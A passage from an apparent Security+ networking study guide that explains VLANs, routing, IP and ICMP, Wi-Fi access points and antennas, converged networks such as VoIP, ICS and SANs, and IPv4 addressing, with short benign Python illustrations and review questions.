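        vlan = port_vlan[in_port]
        return [p for p, v in port_vlan.items() if v == vlan and p != in_port]

    print(eligible_ports(1))   # [2] -- traffic entering VLAN 10 never reaches VLAN 20 directly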

A more sophisticated method is dynamic assignment. When a device connects to the network, the switch or an
external server assigns it to a VLAN based on device-specific information, such as its MAC address. That
way, it doesn't matter where the device plugs in on the network, it's always on the same VLAN.
Ports can also be assigned by protocol. The switch examines frames to see the protocols used in their
payloads, or even their IP subnets, and forwards to a corresponding set of ports. This may or may not require
an L3 switch: while L3 functions are needed to read IP subnets, even a strict L2 switch can read the payload
protocol type in an Ethernet frame header.
Regardless of how a VLAN's ports are assigned, traffic never actually crosses from one VLAN to another
without being routed. An L3 switch might be able to handle this internally. Otherwise, a router can be
connected to multiple VLANs on the same switch. If that's the only place the router connects, it's sometimes
called a one-armed router, or a router on a stick. Either way, a properly designed VLAN-based network only
routes a minority of traffic, while most remains within its own VLAN.
Since they partition traffic, VLANs can be used to boost security by making sure hosts which shouldn't
directly communicate are kept on different VLANs. This isn't perfect: misconfigured switches and VLAN
hopping attacks can still bypass this line of defense.
Another security risk comes from VLAN trunking, a feature where a link between switches carries traffic from
multiple VLANs. In theory this still keeps VLANs separate since each frame on the trunk is tagged with a
VLAN ID so it won't go to links belonging to other VLANs. In practice it's easy to misconfigure, and even
when configured properly a trunk is an ideal place for an eavesdropper to view or alter traffic from multiple
networks. Even the protocols used to control VLAN trunking can be attacked to reroute or disrupt traffic.


Discussion: The Data Link layer


1. What are the two main elements to a MAC address?
When written in hexadecimal, the first six digits are an OUI indicating the manufacturer, and the last six
are a unique serial number assigned by that manufacturer.
2. By looking at a MAC address, how can you tell if it's broadcast or not?
If it's FF:FF:FF:FF:FF:FF, it's broadcast.
3. How does a switch prevent collisions and reduce congestion?
When the switch receives a frame on one port, it stores it in memory, and listens on other ports before
transmitting it. If a collision still happens, it can still re-transmit the frame. If it knows which port has the
destination address, it sends the frame only to that port.
4. How can switches segment network traffic?
While they don't separate broadcast domains, switches don't send unicast traffic to parts of the network
they know don't contain the destination. Additionally, VLANs allow a single physical switch to segment
traffic as though it were part of a different L2 network.
5. How are frames kept within their VLAN?
Frames are only switched onto connections marked as part of their VLAN. If it's a trunk link, each frame
is tagged with its VLAN ID.

The Network layer


While the Data Link layer has addressing and segmentation features that allow you to build a fairly large
network, it still has its limits. The simplest is that since an L2 network is a single broadcast domain, when you
expand it eventually you'll reach a point where broadcast traffic becomes overwhelming. Even on a smaller
network, misconfiguration or certain attacks can cause a broadcast storm that drowns out other traffic.
Another issue is that a MAC address might uniquely identify a given network interface, but the address
doesn't say anything about where it is, or how to get there. Bridges and switches can learn where a given
address is, but not until they've heard from it, and even then only in limited ways. Eventually, the network just
outgrows its switches' ability to keep track of its nodes without constant floods and broadcasts that crowd the
whole broadcast domain.
L2 networks are also limited in their physical complexity as well as size, since the Data Link layer has no way
of choosing between two alternate paths to the same destination. While you can arrange many switches into a
tree-like physical topology, if you create multiple redundant routes, such as a mesh topology, the result is a
switching loop that sends the same frames circling endlessly through the network while constantly
overwriting switches' MAC tables. There are switching protocols, such as Spanning Tree Protocol, designed
to solve this problem; they work by simply shutting down redundant links unless the primary link fails. This
increases network reliability, but still limits performance.
Layer 3 devices and protocols are designed to overcome these problems and link far larger, more complex
networks up to and including the internet itself. They segment the larger network into multiple broadcast
domains, and govern traffic between them. They have more advanced routing protocols, letting them find
paths and share network information in ways Layer 2 switches cannot. They also use logical addresses, which
are tied to the network's structure; this means they can more easily pass data in the right direction without
knowing the whole network. All of these create attack vulnerabilities, but at the same time give you more
tools to fight attackers.

Routers
Routers sit at the boundaries between broadcast domains. Using both physical and logical address
information, they gather and store information about their surrounding network topology, use it to determine
the best route between any two nodes, and then forward Network layer packets along it. You've probably seen
and worked with routers, such as the kind almost every home or small office has these days, but much like
wireless access points they're often a combination of several devices in one. It's probably easier to understand
what a router does if you imagine a device that does nothing else.
First, understand that a router needs more computing functions and memory than a typical switch. While most
routers today are specialized integrated devices, you can install routing software on any general-purpose
computer on a network. In fact, before cheap consumer routers were common, small networks frequently
used older PCs instead. So let's make the example a PC connected to a large office LAN and configured to
operate purely as a router. Second, a router needs to join at least two different Layer 2 networks. This one
has three separate Ethernet cards, each plugged into a different department network. Third, it needs to use a
routable Layer 3 protocol. This one uses IPv4, like most current LANs.

This example shows a simple internal router, joining multiple layer 2 networks as subnets of a larger network.
It's simultaneously a node on each of those three subnets: Each of its NICs has a different MAC address, and
belongs to a different broadcast domain. In fact, since they're separate NICs they aren't even connected to
each other on the Data Link layer: for data to cross from one to the other it needs to pass up further into the
stack from the NIC driver into the operating system's protocol stack, then back down to the other NIC driver.
Now imagine Host #1 wants to share data with others on the network. If it wants to talk with Host #2 it has to
go only through a switch, so it can communicate directly with #2 using a Layer 2 protocol. To communicate
with Host #3, it needs to cross to another subnet. So it creates an IP packet addressed to #3, and encapsulates
it in a frame to send to the router. The router receives the frame, then looks inside to find the IP packet.
Since it's a Layer 3 device, it can read the packet's destination address and consult its routing table, the set
of rules and data that the router uses to map its surroundings. Since the destination is on a different subnet,
the router encapsulates the packet into a new Ethernet frame, sending it out on subnet B, and addressing it to #3.
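
Here's a minimal Python sketch of the lookup a routing table supports, using the standard ipaddress module; the
subnets, interface names, and destination address are invented for illustration.

    import ipaddress

    routing_table = [
        (ipaddress.ip_network("192.168.1.0/24"), "eth0"),   # subnet A
        (ipaddress.ip_network("192.168.2.0/24"), "eth1"),   # subnet B
        (ipaddress.ip_network("192.168.3.0/24"), "eth2"),   # subnet C
        (ipaddress.ip_network("0.0.0.0/0"),      "eth0"),   # default route
    ]

    def route(destination):
        dst = ipaddress.ip_address(destination)
        # Longest-prefix match: the most specific network containing the destination wins
        matches = [(net, iface) for net, iface in routing_table if dst in net]
        return max(matches, key=lambda m: m[0].prefixlen)[1]

    print(route("192.168.2.30"))   # eth1 -- forwarded onto subnet B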
Remember, this is a very simple example. Large networks might have many subnets linked by routers in a
complex web, so on a larger network the router might have to first send the packet to another router. Also,
Layer 3 networks can have many possible paths between any two nodes, thanks to routers having more
awareness of their surroundings than switches. To do this, they use routing protocols to constantly exchange
information about changes in network conditions.
Like most traditional network devices, routers weren't designed with security in mind, but they turned out to
be the foundation for many modern network security technologies such as firewalls. Their traffic direction
abilities turned out to be easy to modify into other security controls, and since a router needs to be a more
intelligent computer than a switch it's much easier to integrate other security features into most router
hardware. Integrated multifunction devices are most common on smaller networks, but today even dedicated
routers on enterprise networks have an important role in filtering unwanted or suspicious traffic.

IP packets
Internet Protocol version 4 was first deployed in 1983 on ARPANET, an academic and military network that
later became the Internet's primary precursor. It's still used to carry most Internet traffic today, so whenever
you access something on the Internet your computer is probably exchanging IPv4 packets with remote hosts.
Usually no one even qualifies the version: for example an IPv4 address is an "IP address," unless you need to
specify otherwise.
IPv4 is gradually being replaced by IPv6. IPv6 isn't backwards compatible with IPv4, but since it was
designed as a direct successor it's very similar in its overall functions, and both can coexist separately on the
same network segments. The most important feature IPv6 brings for most users is that it allows many more
addresses, but it also includes improvements in performance and security.
On the Network layer IP packets carry the data used by higher level protocols. IPv4 and IPv6 packets have
very similar structure and features.

Header: Contains source and destination addresses, version information, payload type, and additional
control information.

Payload: Contains information to pass on to other protocols. Payloads can include Transport layer data
like TCP segments and UDP datagrams, or Network layer data using other protocols like ICMP.
In networks using IPv6 tunneling, an IPv6 packet can even be carried as the payload of an IPv4
packet.

An important feature in both versions of IP is a time to live (TTL) value in the packet header. Also known as a
hop limit, the TTL is a number set when the packet is generated and incrementally reduced as the packet
moves between routers. Since packets with a TTL of zero are dropped, misdirected packets can't endlessly
circle the network.
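
The Python sketch below shows the TTL from a host's point of view by setting the socket option for outgoing
IPv4 packets (assuming a platform where socket.IP_TTL is available); the destination is an address from the
reserved documentation range and the port number is arbitrary.

    import socket

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, 1)   # expire after a single hop
    sock.sendto(b"probe", ("192.0.2.1", 33434))            # the first router should drop this packet
    sock.close()                                           # and return an ICMP "time exceeded" error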
Another feature found only in IPv4 is fragmentation, which allows a router to break one large IP packet into
several smaller ones in order to transmit across L2 subnets that can't accept larger packet sizes, while still
allowing the destination host to reassemble the original payload. Fragmentation is less useful on today's
networks and is used in a number of TCP/IP attacks, so IPv6 does not support it; instead IPv6 adds features
for hosts to negotiate a packet size compatible with the entire network path.
The structure of IP packets is key to many TCP/IP attacks. Most obviously payloads themselves can contain
malicious data or be the object of an attacker who wants to eavesdrop or modify network data. Headers are
another target: not only can addresses be maliciously altered, so can other header fields.


ICMP
It isn't IP's job, or that of the Network layer in general, to discover errors in data going to higher level
protocols; at the same time, Layer 3 devices need a control protocol for sending diagnostic and error
information relevant to the layer. In TCP/IP networks, this role is fulfilled by the Internet Control Message
Protocol (ICMP).
ICMP is a significant and indispensable component of IP network traffic, but compared to other central
protocols, it's somewhat of an oddity. It's not a protocol that serves a fixed purpose, but rather a framework
that's used for a variety of message types. The messages themselves are carried as IP payloads, but the way
they're handled and the functions they serve are different from most payloads, especially Transport layer
protocols. They're not usually employed by end-user applications, with the exception of network diagnostics.
Instead, they're used mostly by routers and other devices on the Network layer to communicate network
conditions.
The flexible and ubiquitous nature of ICMP also makes it a key part of network attacks. ICMP packets can be
used to flood networks as part of a DoS attack, and deliberately malformed messages can be used to exploit
weaknesses in TCP/IP stack implementations. Even just normal ICMP messages are valuable tool for an
attacker probing a network for vulnerabilities. It's an important part of network defense to block or at least
detect suspicious ICMP traffic, without disrupting the vital messages that allow normal network function.
Unless you're pretty deeply involved in network diagnostics you don't really need to know the inner workings
of ICMP. Some of the most common message types include echo request (or ping) messages used to verify
connectivity, router advertisement or solicitation messages used to help hosts find routers on the local
network, and error messages like "host unreachable" or "time exceeded."
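
For instance, this Python sketch shells out to the operating system's ping utility to send a single echo
request, assuming a Unix-style ping that takes -c for the packet count; the target is a documentation-range
address used here only as a placeholder.

    import subprocess

    result = subprocess.run(["ping", "-c", "1", "192.0.2.1"],
                            capture_output=True, text=True)
    if result.returncode == 0:
        print("Echo reply received -- host is reachable")
    else:
        print("No echo reply -- host may be down, or ICMP may be filtered")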

Discussion: The network layer


1. How can a switched LAN benefit from Layer 3 devices like routers?
Large or looped broadcast domains are subject to broadcast-based congestion, switches aren't very good
at communicating network information with each other, and routers can more reliably segment
communication for the sake of security.
2. Compare and contrast the structure of an IP packet vs an Ethernet frame.
Both have a payload that can encapsulate higher level protocols, and a header with source and
destination addresses. Since the frame is on the Data Link layer, it has MAC addresses, while the Network
layer packet has IP addresses. Both have different header options: in particular, the packet has a TTL
value that limits how long it can circulate through the network.
3. Why are routers an essential part of network security?
Even routers that aren't designed for security block broadcast traffic and have awareness of the overall
network structure. More importantly, the functions needed to perform basic routing functions also make
them ideal for adding packet filtering and other advanced security roles.
4. Apart from errors, what information might be sent by ICMP?
Examples include more efficient routes, confirmation that a host is up and working, or the presence of a
router on a network.
5. What features of IPv4 packet headers were removed from IPv6, and why?
IPv4 headers include fragmentation information, but IPv6 headers do not. Fragmentation can cause security or
performance problems, so IPv6 instead expects hosts to negotiate a packet size compatible with the entire
network path.


Wireless access points


Devices in wireless networks are often very much like those in wired LANs. For example, every node on a
Wi-Fi network, whether a PC, mobile device, or a router, needs to have a wireless NIC. Functionally, it's
exactly like an Ethernet adapter; it just has a wireless transceiver and antenna rather than an RJ-45 interface,
and encodes data in (probably encrypted) 802.11 Wi-Fi frames rather than 802.3 Ethernet frames.
Other devices are a little harder to categorize in Ethernet terms, even if there are still parallels. The most
obvious is the wireless access point that pretty much every wireless network uses to connect to a wired
network. It's easy to imagine that's equivalent to a router, and you can find devices labeled wireless routers in
any electronics store, but it needs a little more explanation than that. If you went into a store and bought a
"wireless access point" it might also be a router, an Ethernet switch, a NAT device, a firewall, and possibly a
coffee maker; in the end it's just another case of multiple device functions being bundled into a single piece of
hardware.

To see things more clearly you could also just buy a device that's only an access point, connecting Wi-Fi
devices into an Ethernet network without any routing or addressing decisions. In classical network terms it's
still a bit of a hybrid device. On the one hand, it's an L2 translating bridge that converts between Wi-Fi and
Ethernet. On the other hand, within the wireless network it functions more like a hub, since a single Wi-Fi
network is a single collision domain. Either way, an access point is just a physical interface for the network
that clients can figuratively plug into.
These features also mean that a WAP, in itself, is less secure than an Ethernet switch. Since it can't separate
collision domains it can't segment the network, and since anyone in range can connect, physical security
measures aren't very useful either. This is much of why WAPs typically include encryption and other security
functions that are much less common in Ethernet devices.

WAP types
Comparing typical consumer WAPs with devices that are just access points isn't a theoretical exercise, since
both are in regular use. The former are examples of fat or standalone access points. Not only do they have
other bundled functions like firewalls and routers, they manage wireless security features and have web
interfaces for user management. In a small workplace that only needs one or two WAPs, a standalone model
with strong security features is a good fit. On larger networks they can add expense and overhead, since each
must be configured separately.

Exam Objective: CompTIA SY0-501 2.1.8.6, 2.1.8.7, 3.2.1.4, 3.2.1.8


For larger networks, a useful alternative is a series of thin APs that consist of little more than an antenna and
transceiver, with a single connection to the network. All other functions are offloaded to a centralized
wireless LAN controller on a server rack, which performs client management and security functions while
presenting a single interface for centralized network management. Centrally controlled thin APs even allow
easier Wi-Fi roaming that lets users move throughout the coverage area without disconnecting and re-authenticating on
each AP along the way.
A third option is a bit between the two: controllerless APs that have a little more processing power than thin
APs but aren't entirely standalone. Instead of a central controller, all APs function as a single cluster that
shares and distributes management functions throughout the network. This is a bit more complex to
implement than a central controller, but more fault tolerant.
Finally, you can have a wireless network without a WAP at all. In an ad hoc network, each device
communicates with other devices in peer-to-peer fashion without any central access point, even allowing
devices to serve as relays for endpoints that aren't directly in range of each other. This can save infrastructure
cost and eliminate a single point of failure, but it's harder to centrally manage and secure, and doesn't offer
access to the internet or other outside networks unless one or more of those peers function as a gateway.
 Standard 802.11 ad hoc networks don't scale very well, so it's more common for one device (usually
with a separate Ethernet or cellular internet connection) to operate as a "mobile hotspot" AP for other
clients to join.
 More sophisticated wireless mesh networks can give more efficient operation and secure management.
They may be client-only, or also support interconnection of access points as part of a larger mesh.
 Several non Wi-Fi standards use ad hoc wireless networks. You might find these in cellular devices,
vehicles, IoT devices, and military equipment.

Every Wi-Fi network identifies itself by a service set identifier (SSID), generally a human-readable network
name. A WAP can be configured to broadcast its SSID as an advertisement to people looking for networks.
Turning SSID broadcast off makes the network less obvious to casual onlookers, but won't hide it from an
actual search.

Wi-Fi signals
Wi-Fi can use a number of different frequency bands. Radio waves of different frequencies have different
properties, leading to some benefits and drawbacks to each.

Exam Objective: CompTIA SY0-501 2.1.8.3, 2.1.8.4

2.4 GHz The most common frequency band for Wi-Fi. It has relatively long range and is widely
available, but it only has a small number of channels, which overlap with each other. This
means it's easy for many 2.4 GHz networks in a small area to saturate all the available channels
and cause heavy interference. Additionally, many non-Wi-Fi devices use this band.
5 GHz A higher frequency band. 5 GHz transceivers tend to be more expensive and have a shorter
range, but there are more channels, they don't overlap, and fewer other devices use it. This
means it's less prone to interference, and usually allows a higher data rate.
60 GHz An extremely high frequency band. Allows a very high data rate, but it can't generally pass
through walls. That means you can only use it where the client has a clear line of sight. This can
be inconvenient, but it has security benefits.

A given Wi-Fi device might support multiple bands, and even combine them for increased bandwidth or
fallback capacity. For example, a 5 GHz or 60 GHz device can fall back to the longer-range 2.4 GHz
band when signal strength drops, using whichever band maintains better speed and reliability.
Whatever band your devices use, distance reduces signal strength, and with it the maximum bandwidth.
All devices on a given network have to share the same bandwidth, and frame collisions or other congestion
reduces speeds further. It's a safe bet to assume the effective speed of a given Wi-Fi standard will be much
lower than what's listed on the box.

Antenna types
Wireless transceivers need some sort of antenna to convert electrical signals to and from radio waves. Most
mobile and Bluetooth devices have small internal antennas you don't really need to worry about, but when
you choose or place a WAP, the style and placement of antennas are an essential part not only of network
performance, but of security as well. There are many shapes an antenna can take, but they fall into two basic
categories.

Omnidirectional Broadcast and receive signals in all directions. While no antenna is perfectly
omnidirectional, "stick" shaped monopole and dipole antennas are pretty close,
especially when a device includes multiple antennas you can angle differently to maximize
coverage area. Common omnidirectional Wi-Fi antennas include the "rubber ducky"
models included with many SOHO WAPs, the "inverted F" antennas built into most
mobile devices, and dome-shaped ceiling antennas.
Directional Broadcast and receive signals very efficiently in one direction but not in others. A
directional antenna has a much longer range than an omnidirectional model of similar
size and power, but only in the direction it is pointed. How directional an antenna is
depends on its shape, and there are multiple models used for Wi-Fi broadcasts.
•  Flat patch antennas broadcast on a wide angle, while still being more directional
than a dipole.
•  Dish-shaped parabolic antennas broadcast in a very narrow cone, and can reach
longer distances than other models. They're most often used for point-to-point
connections, such as joining networks in two buildings via Wi-Fi.
•  Yagi antennas, easily recognizable by multiple parallel rods mounted on a central
spine, are strongly directional, but usually less so than parabolic dishes.
•  Homemade cantennas consisting of simple metal probes placed inside metal cans
or foil-lined tubes can be used as directional antennas, but usually won't be as
effective as a commercial model.

When it comes to Wi-Fi, coverage and security have a complicated relationship. For performance, it's ideal to
have a strong signal everywhere users are likely to be. For security, it's best to make sure that people outside
of secured areas have minimal opportunity to connect to or eavesdrop on Wi-Fi networks. Antenna choice is
much of how you can shape coverage areas.
•  Even if you can't easily move the WAP to where you want the antenna to be, many have standard RP-
SMA connectors that support extension cables as well as various antenna types.
•  Directional antennas are a good way to limit coverage along a corridor. Wide-angle patch antennas
mounted on ceilings can cover a room while restricting coverage outside.
•  To further restrict coverage, many WAPs allow you to reduce broadcast signal strength. This can hurt
performance in larger coverage areas, but isn't as much an issue in small spaces.
•  Directional antennas can also be connected to wireless clients with external antenna connections. This
is useful for reaching a wireless hotspot at a distance - including for attackers who can't easily get
inside the normal coverage area.

Discussion: Wireless access points


1. Barring configuration features, how is a WAP less secure than a switch?
Since it can't separate collision domains it can't segment the network, and since anyone in range can
receive its broadcasts physical security measures aren't very useful either.
2. Would thin or fat APs be a better fit in your organization?
For smaller organizations and coverage areas standalone APs are cheaper and easier to manage, but
thin APs have lower management overhead in large wireless networks.
3. How can choice of antenna affect security?
Directional antennas, careful placement, and reduced broadcast power can shape the coverage area so that
people outside secured spaces have less opportunity to connect to or eavesdrop on the network.

Unconventional and converged networks


When you think of "the network" it's natural to imagine a typical IP network linking clients and servers to
each other and the internet, but that's hardly the only kind. Other networks are used for telephone
communications, industrial control systems, security alarms and cameras, HVAC controls, and dedicated data
storage networks that connect to servers. Traditionally, these networks were separate from computing LANs:
they used different protocols, different switching methods, and connected devices that had no reason or ability
to communicate with general purpose computers. Some weren't even entirely digital systems, for that matter.
Even more than other older networks, security usually wasn't a concern: not only were the individual devices
not considered particularly vulnerable to attack, but there usually was fairly little attack surface for the
network in the first place.
Today, network convergence means that not only are these other networks increasingly being connected to
high performance TCP/IP networks, but IP networks are even directly carrying the traffic and performing the
duties that used to be handled by those other networks. While this approach is cost-effective and opens
possibilities no one imagined in the past, it changes the security situation dramatically. Not only are these IP-
enabled devices vulnerable to attacks targeting IP networks in general, but many of them today are using the
same computing technology other hosts are. A digital telephone server or industrial control device that's
operating on the same sort of hardware and operating system you might use for an ordinary network host will
be vulnerable to the same attacks.
Even when these other networks operate separately from IP networks, either physically separate or just using
other, non-IP protocols across the same physical connections, that doesn't mean they're secure today either.
Increasingly sophisticated devices, especially those sharing PC technologies and operating systems, have
increasing vulnerabilities to modern attackers. Even dedicated devices aren't immune: attacks have been
found which target specialized embedded systems, using PCs as nothing more than a transmission vector.
Security researchers have even demonstrated the ability to take control of common automobile models right
on the highway. While most of these attacks have been limited or required specialized resources, the lesson is
clear: no digital system that allows external data connections can be considered truly immune to network
attacks.

Voice over IP
Voice over IP is exactly what it sounds like: voice transmissions are digitized, broken up into packets, and
sent over an IP network. This generally implies two or more directions, like a telephone conversation or
conference call, as opposed to one-way like streaming audio, but both are examples of real time services that
carry data intended to imitate the constant stream of a dedicated media transmission, and both have similar
challenges. Thanks to improved technologies and generally faster networks, VoIP has advanced rapidly,
especially in the last ten years, to replace circuit-switched calling at every level while still interoperating with
PSTN users and numbers:

Exam Objective: CompTIA SY0-501 2.1.16

•  Voice chat applications used by computers or mobile devices
•  Phone service included with cable or fiber-optic Internet connections
•  Private branch exchanges (PBX) used in internal private telephone networks
•  Voice over LTE (VoLTE) used on 4G cellular networks
•  IP backhaul, the connection of telephone switching centers over public IP networks

Beyond just telephone calls, VoIP systems often support other phone-related services such as voice mail, SMS
text messages, and fax functions. Since the IP network allows transmission and integration of data in ways
traditional phone services do not, they can add additional features. The most visible, straight out of classic
science fiction, is how easily VoIP technologies extend into video teleconferencing, but they can also add
presence services that report on an intended recipient's real-time availability and allow unified collaboration
over multiple communication systems.
The topology of a VoIP network is just like any other IP network. The only difference is the specific clients,
servers, and protocols in use. Likewise, the gateway can lead either to a packet- or circuit-switched public
network, or even to both. The other end of the conversation is presumably some sort of telephone (analog or
digital) rather than a conventional host or LAN, but intermediate systems don't really need to know one way
or the other.

IP phone Outwardly looks and acts like a normal analog telephone, whether handset or
headset; it may also have additional features. It connects to an Ethernet switch
rather than an analog telephone network.
Call agent Replaces most logical functions of a telephone exchange by managing
connections and routing calls. The call agent responds to dialing requests from
local phones, and routes remote calls to the correct phone.
Media gateway Connects the PBX LAN to the outer IP or PSTN WAN, and controls calls into or
out of the PBX. The gateway can also manage WAN bandwidth, refusing calls
when the link becomes saturated.
Application server Provides additional PBX services such as voice mail, or advanced UC services.
Multipoint control unit Manages teleconferences between more than two users. The multiple audio or
(MCU) video streams of a large teleconference can be bandwidth and processor intensive,
so the MCU might have specialized hardware to combine them.

Any of these devices could be a specialized hardware appliance. Many can also be software applications
running on general purpose computing hardware. Either way, since they're on the IP network, they need to be
treated as hosts, devices, or applications and secured like any other.

Industrial control systems


Industrial control systems (ICS) are devices used to monitor and control industrial systems. They're
commonly used in factories, industrial process plants, and distribution infrastructures like power grids or gas
and water pipelines. The obvious value of central control and monitoring meant that ICS started becoming a
networking technology decades ago, but for a long time they mostly used specialized technologies. More
recently, ICS networks have increasingly adopted TCP/IP over Ethernet technologies, and have even become
a driving force of the Internet of Things, the growing phenomenon of tools and devices not normally
associated with computer networking, but outfitted with electronics and joined to existing networks.
For a long time, the two most common ICS paradigms were Supervisory Control And Data Acquisition
(SCADA) and Distributed Control System (DCS). Originally the two were designed in very different ways to
serve very different needs, and technical limitations kept either from being very good at the other's job. Later,
as networks got faster and computers got more powerful, the boundaries between the two became increasingly
blurred.
•  SCADA was developed for large scale distribution systems, and is focused on information gathering
and limited control. The central station may not be in frequent and reliable contact with individual
devices, so it doesn't focus on fine control of discrete processes so much as watching for state changes
in remote systems and sending control messages in response.
•  DCS was designed to extend existing process control systems in refineries and other industrial plants,
while still remaining within the confines of a single operation. Since the networks involved were higher
speed over shorter distances, it's based on the idea of real time monitoring and control of process states,
with equipment directly controlled through a hierarchy of networked systems. On the other hand, since
it's designed for managing discrete processes it's less capable of monitoring state changes and is unable
to tolerate unreliable service.

Not only are ICS networks increasingly being built on TCP/IP over Ethernet, but they're also increasingly
being connected to existing data networks or standard computer systems, rather than being entirely isolated
and specialized as they were in the past. They're also being more widely used: these standards and newer ones
aren't just used for large industrial plants, but also to control such simple things as appliances and HVAC
systems.
The benefits aren't hard to see, but the primary drawback is security: ICS design traditionally is very open,
robust, and forgiving, with no thought given to security. Worse, it's frequently used for critical infrastructure
and industry applications where sabotage or malfunction could be not only costly but even deadly. Discovery
of the Stuxnet worm designed to attack ICS hardware has drawn the attention of security experts to ICS
vulnerabilities. Importantly, Stuxnet relied on traditional IP networks and removable USB media to spread,
which demonstrates the dangers of converging networks and using insecure media.

Network storage
Remote storage is one of the most basic uses of a network, but it's still been greatly affected by the
convergence of network technologies thanks to the development of the storage area network (SAN). To
understand why it's significant, first you need to know a couple of related and easily confused terms.
Early on, storage systems were all what's now called directly attached storage (DAS), which as the name
suggests is directly attached to a host. Modern examples of DAS are internal and external SATA and USB
drives. The host's operating system manages the file system, while the DAS doesn't really need an operating
system, just some controlling electronics for the host to access.
DAS by its nature can be controlled by only one host at a time, but the operating system can always share
folders, or entire drives, on the network for wider access. It started on general purpose servers, but specialized
file servers gave better performance since they don't have other tasks consuming resources. Eventually faster
and cheaper computers led to network attached storage (NAS): a specialized hardware appliance with nothing
but hard drives, a network interface, and a stripped down operating system optimized for sharing files. On the
network they're really all the same thing, letting any host with suitable permissions access the shared storage
space.
One important limitation of NAS is that it's still a drive directly controlled by another computer, even if that
computer is a dedicated appliance. While you can access it over the network, you don't have the full control
over it that you would have with DAS on your own system. Additionally, if you're just one of many clients trying to
access it, the NAS can run into assorted performance and flexibility problems. One solution is a storage area
network (SAN), an array of storage devices on the network. A SAN is much like a NAS except that its
controlling hardware allocates it more directly to network hosts and protects file systems from simultaneous
access by multiple hosts. That way, hosts can create and access drives over the network, while retaining all the
flexibility and control of DAS.
Both NAS and SAN have obvious security implications, since both are means of sharing data directly over a
network connection. NAS isn't too complicated at least: since it's fundamentally a file server running on
dedicated hardware you secure it the same way, by making sure the NAS itself and the file-sharing protocols
are protected against attackers and eavesdroppers. SAN is a more complicated solution used primarily but not
exclusively in large server rooms and data centers. It uses specialized protocols which may or may not be on
IP networks and may or may not be shared with other traffic.

Discussion: Network convergence


1. Does your workplace use VoIP, industrial control systems, or SANs?
Answers may vary.
2. Why is security a fairly new concern in ICS networks?
They were never designed with security in mind, but they tended to use their own proprietary systems and
weren't frequently the target of network attacks. ICS-targeting malware and all-IP networks have
drastically changed the situation.
3. Why would someone attack a VoIP network?
Attackers might want to eavesdrop on calls, place fraudulent calls, or compromise servers and devices
for other network attacks.
4. How should you secure VoIP networks?
Since they're comprised of IP devices and servers, you should secure them like any other hosts and
appliances, and consider putting them on segmented networks.

Assessment: Network components


1. Order the OSI layers from bottom to top.

1. Application
2. Data Link
3. Network
4. Physical
5. Presentation
6. Session
7. Transport
4, 2, 3, 7, 6, 5, 1
2. What kind of WAP is designed for use with a central WLAN controller? Choose the best response.
•  Controllerless
•  Fat
•  Mesh
•  Thin

3. What happens to a non-tagged frame on a VLAN trunk?
•  It's flooded to all VLANs the trunk carries.
•  It's forwarded to the lowest-numbered VLAN.
•  It's forwarded to the trunk's native VLAN.
•  It's dropped without an error message.

4. What protocol would an echo request packet use?
•  ARP
•  ICMP
•  TCP
•  UDP

5. Which storage option is just a refinement of traditional file servers?
•  iSCSI
•  NAS
•  SAN

6. For a point-to-point wireless link between two buildings, what antenna style would keep a strong signal
between transceivers while minimizing the area for eavesdropping? Choose the best response.
•  Dipole
•  Monopole
•  Patch
•  Yagi

Module B: Network addressing


IP addresses are very different from MAC addresses not only in their format but their function. Instead of
being a nearly random string meant to uniquely identify a physical device, an IP address is assigned to a host
according to its place in the network's logical topology. This means that even without knowing where a
particular host is on the network, a router can read an IP address and determine what direction the host lies in.
IP addressing standards and assignment are part of basic network function, but they have a lot of security
ramifications as well so they're important to understand. Not only are IP address ranges an important factor in
monitoring and filtering network traffic, but address resolution protocols are a frequent target of network
attacks. Additionally, network address translation used widely on LANs can be either part of a security
strategy, or a compatibility challenge in enacting security controls.
You will learn:
•  About IPv4 and IPv6 addresses
•  About address resolution protocols
•  About network address translation

IPv4 addresses
Both IPv4 and IPv6 addresses follow similar principles, but since the former is more common and uses
simpler addresses, it's an easier place to start.
IPv4 addresses are 32-bit binary values: for readability purposes they're usually written as four octets in
dotted decimal notation. It's not just a serial number though: each address has two parts. The network ID
identifies a unique subnet on the wider network, while the host ID identifies a specific host on that subnet.
One reason for this is routing: when you send a packet through a large network like the Internet, no router is
going to know the precise location of every host, but it's easier to keep track of where subnets are. Once the
packet gets to that subnet, its local routers know just where every host is, and can use the rest of the address to
deliver it. It's a lot like mailing a letter out of town: your local post office doesn't have to worry about the
house number, they just need to make sure it goes to the right city. Likewise, if the letter is local, they can
move right on to checking the street address.
There's one complication though: it's not like MAC addresses, where the first half is a manufacturer number and
the second half is a serial number. To allow subnets of different sizes, IP addresses have variable length network
IDs and host IDs. Since the two together are always 32 bits, if one is larger, the other needs to be
smaller. For example, a network might have a 16-bit network ID and a 16-bit host ID, or it might have a 24-
bit network ID and an 8-bit host ID.

Since the network ID length is variable, there's one more bit of information that's part of an IP address. The
subnet mask is another 32-bit number, but it's always presented as a string of consecutive ones followed by a
string of consecutive zeroes. The ones represent the length of the Network ID, and the zeros the length of the
host ID so you, or any computer, can easily separate the two. The subnet mask is often written in the same
dotted decimal notation, for example 255.255.255.0 for an address with 24 bits of subnet ID and 8 bits of
host ID. It can also be written in prefix notation, simply showing the length of the network ID: the same
subnet mask would be /24.

This doesn't mean IP addresses are effectively 64-bit. First, you don't need to know a computer's subnet mask
to connect to it: only routers and the computer itself need to know. Second, the subnet mask is always
contiguous ones on the left and contiguous zeroes on the right, never mixed or reversed. This means there are
only 33 possible subnet mask values, and even then some are much more common than others.
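If you want to experiment with how an address splits into a network ID and a host ID, Python's standard ipaddress module can do the math. This is a minimal illustrative sketch, not part of the exam material; the address and prefix are invented.

import ipaddress

# A hypothetical host address with a 24-bit network ID (/24 prefix).
iface = ipaddress.ip_interface("192.168.10.25/24")
print(iface.ip)        # the full host address: 192.168.10.25
print(iface.network)   # the network it belongs to: 192.168.10.0/24
print(iface.netmask)   # the mask in dotted decimal: 255.255.255.0
# ANDing the address with the mask isolates the network ID: 192.168.10.0
print(ipaddress.ip_address(int(iface.ip) & int(iface.netmask)))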

Classful and classless addressing


Originally, you didn't even need to specify a subnet mask. When IPv4 was implemented on ARPANET and later
the Internet, the Internet Assigned Numbers Authority (IANA) was given the authority to allocate IP
addresses to universities, government agencies, ISPs, and other organizations that joined the growing
network. To better organize network assignments, the IANA split up the IPv4 address space into five classes,
according to the value of their first octet. This system was called classful networking.
Class   First octet   First bits   # of subnets   # of hosts    Subnet mask     Mask prefix
A       0-127         0            128            16,777,216    255.0.0.0       /8
